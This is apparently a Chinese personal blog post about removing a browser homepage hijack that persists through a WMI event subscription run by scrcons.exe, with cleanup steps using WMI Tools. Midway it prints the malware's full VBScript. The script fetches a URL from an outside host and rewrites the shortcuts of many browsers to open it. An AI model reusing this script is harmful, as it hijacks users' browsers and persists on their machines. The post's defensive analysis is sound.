浏览器首页被劫持

最近一不小心运行了一个流氓软件,它很贴心地给我装上了全套的杀毒套装,浏览器套装,这些东西还好,可以自己删除干净,唯一不能忍的是,它将我电脑上的所有的浏览器的首页给劫持了,只要一打开浏览器,首先跳转到一个指定的网站,叫做http://qtipr.com/,和以前跳到hao123.com是一样一样的.

我仔细看了一下快捷方式,发现已经被篡改了:

被篡改的快捷方式

即使去掉上图中圈起来的网址,那也只能保证一时,不过多久,立马就回复原状了,很明显,是流氓软件在电脑里设置了一个定时器之类的东西,每隔多少分钟就重写一次快捷方式,甚是可恶.

后来自己拿工具检测了一下究竟是什么软件改了快捷方式,发下原来是scrcons.exe这个玩意.顺带查了一下资料,还真有关于如何来处理这种劫持的办法.

首先要下载一个工具: WMI Tools.

安装后打开WMI event viewer，点击左上角register for events，弹出Connect to namespace框，填入“root\subscription”，确定，出现下图：

点击左侧_EventFilter:Name="unown_filter"，再至右侧右键点击ActiveScriptEventConsume r Name="unown"，选择view instant properties，如下图：

我这里附上一段代码,大致是如下的:

Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemObject"):On Error Resume Next : link = homePageUrl: linkChrome = " --load-extension=""C:\Users\Yihulee\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"" " + homePageUrl:browsers = Array("IEXPLORE.EXE", "firefox.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe","chrome.exe","360chrome.exe"):ChromeBrowsers = Array("chrome.exe","360chrome.exe"):Set BrowserDic = CreateObject("scripting.dictionary"):For Each browser In browsers:BrowserDic.Add LCase(browser), browser:Next:Set ChromeBrowserDic = CreateObject("scripting.dictionary"):For Each ChromeBrowser In ChromeBrowsers:ChromeBrowserDic.Add LCase(ChromeBrowser), ChromeBrowsers:Next:Dim FoldersDic(12):Set WshShell = CreateObject("Wscript.Shell"):FoldersDic(0) = "C:\Users\Public\Desktop":FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu":FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs":FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup":FoldersDic(4) = "C:\Users\Yihulee\Desktop":FoldersDic(5) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Windows\Start Menu":FoldersDic(6) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":FoldersDic(7) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup":FoldersDic(8) = "C:\Users\Yihulee\AppData\Roaming":FoldersDic(9) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":FoldersDic(10) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu":FoldersDic(11) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar":Set fso = CreateObject("Scripting.Filesystemobject"):For i = 0 To UBound(FoldersDic):For Each file In fso.GetFolder(FoldersDic(i)).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If BrowserDic.Exists(LCase(name)) Then:If ChromeBrowserDic.Exists(LCase(name)) Then:oShellLink.Arguments = linkChrome:else:oShellLink.Arguments = link:End if:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:Next:createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

可以看得到,几乎所有的浏览器都榜上有名,如IEXPLORE.EXE, chrome.exe, firefox.exe, 360chrome.exe, 360SE.exe, SogouExplorer.exe, opera.exe, Safari.exe, Maxthon.exe, TTraveler.exe, TheWorld.exe, baidubrowser.exe, liebao.exe, QQBrowser.exe ,然后快捷方式所在的文件夹,如C:\Users\Public\Desktop等都历历在目,这种代码一看就不是什么好鸟.

最后，清除方法：在WMI event viewer中将“_EventFilter:Name="unown_filter"项目右键删除！删不掉？到WMITool安装路径（例如：C:\Program Files (x86)\WMI Tools）下，右键点击wbemeventviewer.exe，选择以管理员身份运行！删之！还没完，还要手动将快速启动栏中，将各个浏览器快捷命令中的那段网址去掉！暂时就这么多了，还有没有其它影响的话，用用再看吧！